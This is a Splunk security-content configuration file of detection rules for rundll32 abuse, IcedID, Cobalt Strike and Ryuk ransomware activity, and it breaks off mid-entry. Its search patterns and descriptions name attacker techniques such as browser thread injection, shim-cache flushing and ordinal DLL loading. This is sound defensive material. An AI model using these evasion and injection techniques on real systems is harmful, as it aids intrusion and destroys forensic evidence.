{"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the suspicious Remote Thread execution of rundll32.exe to any process. This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the SourceImage, TargetImage, and EventCode executions from your endpoints related to create remote thread or injecting codes. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-29 action.escu.modification_date = 2021-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Create Remote Thread To A Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundl32 process $SourceImage$ create a remote thread to process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "SourceImage", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Create Remote Thread To A Process - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe to any process. This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. action.notable.param.rule_title = Rundll32 Create Remote Thread To A Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 SourceImage = "*\\rundll32.exe" TargetImage = "*.exe" | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage TargetProcessId SourceProcessId StartAddress EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_create_remote_thread_to_a_process_filter` [ESCU - Rundll32 CreateRemoteThread In Browser - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the SourceImage, TargetImage, and EventCode executions from your endpoints related to create remote thread or injecting codes. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-26 action.escu.modification_date = 2021-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 CreateRemoteThread In Browser - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundl32 process $SourceImage$ create a remote thread to browser process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "SourceImage", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 CreateRemoteThread In Browser - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. action.notable.param.rule_title = Rundll32 CreateRemoteThread In Browser action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 SourceImage = "*\\rundll32.exe" TargetImage IN ("*\\firefox.exe", "*\\chrome.exe", "*\\iexplore.exe","*\\microsoftedgecp.exe") | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage TargetProcessId SourceProcessId StartAddress EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_createremotethread_in_browser_filter` [ESCU - Rundll32 DNSQuery - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and eventcode = 22 dnsquery executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-02-18 action.escu.modification_date = 2022-02-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 DNSQuery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process $process_name$ made a DNS query for $query$ from host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 DNSQuery - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. action.notable.param.rule_title = Rundll32 DNSQuery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 process_name="rundll32.exe" | stats count min(_time) as firstTime max(_time) as lastTime values(query) as query values(answer) as answer values(QueryResults) as query_results values(QueryStatus) as query_status by process_name process_guid Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_dnsquery_filter` [ESCU - Rundll32 LockWorkStation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32 commandline to lock the workstation through command line. This technique was seen in CONTI leak tooling and script as part of its defense evasion. This technique is not a common practice to lock a screen and maybe a good indicator of compromise. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious rundll32 commandline to lock the workstation through command line. This technique was seen in CONTI leak tooling and script as part of its defense evasion. This technique is not a common practice to lock a screen and maybe a good indicator of compromise. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-09 action.escu.modification_date = 2021-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 LockWorkStation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = Process $process_name$ with cmdline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 LockWorkStation - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process= "*user32.dll,LockWorkStation*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_lockworkstation_filter` [ESCU - Rundll32 Process Creating Exe Dll Files - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior seen in rundll32 process of IcedID that tries to drop copy of itself in temp folder or download executable drop it either appdata or programdata as part of its execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior seen in rundll32 process of IcedID that tries to drop copy of itself in temp folder or download executable drop it either appdata or programdata as part of its execution. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, TargetFilename, and eventcode 11 executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Process Creating Exe Dll Files - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process drops a file $file_name$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Process Creating Exe Dll Files - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior seen in rundll32 process of IcedID that tries to drop copy of itself in temp folder or download executable drop it either appdata or programdata as part of its execution. action.notable.param.rule_title = Rundll32 Process Creating Exe Dll Files action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 Image="*rundll32.exe" TargetFilename IN ("*.exe", "*.dll") | stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename Computer | rename Computer as dest | rename TargetFilename as file_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_process_creating_exe_dll_files_filter` [ESCU - Rundll32 Shimcache Flush - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious rundll32 commandline to clear shim cache. This technique is a anti-forensic technique to clear the cache taht are one important artifacts in terms of digital forensic during attacks or incident. This TTP is a good indicator that someone tries to evade some tools and clear foothold on the machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious rundll32 commandline to clear shim cache. This technique is a anti-forensic technique to clear the cache taht are one important artifacts in terms of digital forensic during attacks or incident. This TTP is a good indicator that someone tries to evade some tools and clear foothold on the machine. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-10-05 action.escu.modification_date = 2021-10-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Shimcache Flush - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process execute $process$ to clear shim cache in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Shimcache Flush - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious rundll32 commandline to clear shim cache. This technique is a anti-forensic technique to clear the cache taht are one important artifacts in terms of digital forensic during attacks or incident. This TTP is a good indicator that someone tries to evade some tools and clear foothold on the machine. action.notable.param.rule_title = Rundll32 Shimcache Flush action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` AND Processes.process = "*apphelp.dll,ShimFlushCache*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_shimcache_flush_filter` [ESCU - Rundll32 with no Command Line Arguments with Network - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 with no Command Line Arguments with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = A rundll32 process $process_name$ with no commandline argument like this process commandline $process$ in host $src$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 with no Command Line Arguments with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-34527"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Rundll32 with no Command Line Arguments with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_rundll32` AND Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(rundll32\.exe.{0,4}$)" | rename dest as src | join host process_id [| tstats `security_content_summariesonly` count latest(All_Traffic.dest) as dest latest(All_Traffic.dest_ip) as dest_ip latest(All_Traffic.dest_port) as dest_port FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by host All_Traffic.process_id | `drop_dm_object_name(All_Traffic)`] | `rundll32_with_no_command_line_arguments_with_network_filter` [ESCU - RunDLL Loading DLL By Ordinal - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are possible with native utilities and third party applications. Filtering may be needed based on command-line, or add world writeable paths to restrict query. action.escu.creation_date = 2022-02-08 action.escu.modification_date = 2022-02-08 action.escu.confidence = high action.escu.full_search_name = ESCU - RunDLL Loading DLL By Ordinal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"] action.risk = 1 action.risk.param._risk_message = A rundll32 process $process_name$ with ordinal parameter like this process commandline $process$ on host $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RunDLL Loading DLL By Ordinal - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed. action.notable.param.rule_title = RunDLL Loading DLL By Ordinal action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"rundll32.+\#\d+") | `rundll_loading_dll_by_ordinal_filter` [ESCU - Ryuk Test Files Detected - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = If there are files with this keywoord as file names it might trigger false possitives, please make use of our filters to tune out potential FPs. action.escu.creation_date = 2020-11-06 action.escu.modification_date = 2020-11-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Ryuk Test Files Detected - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware"] action.risk = 1 action.risk.param._risk_message = A creation of ryuk test file $file_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Ryuk Test Files Detected - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation. action.notable.param.rule_title = Ryuk Test Files Detected action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem WHERE "Filesystem.file_path"=C:\\*Ryuk* BY "Filesystem.dest", "Filesystem.user", "Filesystem.file_path" | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ryuk_test_files_detected_filter` [ESCU - Ryuk Wake on LAN Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the users profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to a unknown binary and those endpoints should be isolated until triaged. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the users profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to a unknown binary and those endpoints should be isolated until triaged. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the 